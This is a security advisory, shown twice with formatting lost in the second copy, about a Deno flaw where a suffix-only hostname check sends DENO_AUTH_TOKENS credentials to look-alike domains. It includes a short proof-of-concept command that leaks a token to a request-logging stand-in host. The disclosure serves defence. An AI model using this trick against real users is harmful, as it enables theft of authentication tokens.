Summary
Deno improperly checks that an import specifier's hostname is equal to or a child of a token's hostname, which can cause tokens to be sent to servers they shouldn't be sent to. An auth token intended for example.com may be sent to notexample.com.
Details
auth_tokens.rs uses a simple ends_with check, which matches www.deno.land to a deno.land token as intended, but also matches im-in-ur-servers-attacking-ur-deno.land to deno.land tokens.
PoC
- Set up a server that logs requests. RequestBin will do. For example,
denovulnpoc.example.com.
- Run
DENO_AUTH_TOKENS=a1b2c3d4e5f6@left-truncated.domain deno run https://not-a-left-truncated.domain. For example, DENO_AUTH_TOKENS=a1b2c3d4e5f6@poc.example.com deno run https://denovulnpoc.example.com
- Observe that the token intended only for the truncated domain is sent to the full domain
Impact
What kind of vulnerability is it? Who is impacted?
Anyone who uses DENO_AUTH_TOKENS and imports potentially untrusted code is affected.
References
Summary
Deno improperly checks that an import specifier's hostname is equal to or a child of a token's hostname, which can cause tokens to be sent to servers they shouldn't be sent to. An auth token intended for
example.commay be sent tonotexample.com.Details
auth_tokens.rs uses a simple ends_with check, which matches
www.deno.landto adeno.landtoken as intended, but also matchesim-in-ur-servers-attacking-ur-deno.landtodeno.landtokens.PoC
denovulnpoc.example.com.DENO_AUTH_TOKENS=a1b2c3d4e5f6@left-truncated.domain deno run https://not-a-left-truncated.domain. For example,DENO_AUTH_TOKENS=a1b2c3d4e5f6@poc.example.com deno run https://denovulnpoc.example.comImpact
What kind of vulnerability is it? Who is impacted?
Anyone who uses DENO_AUTH_TOKENS and imports potentially untrusted code is affected.
References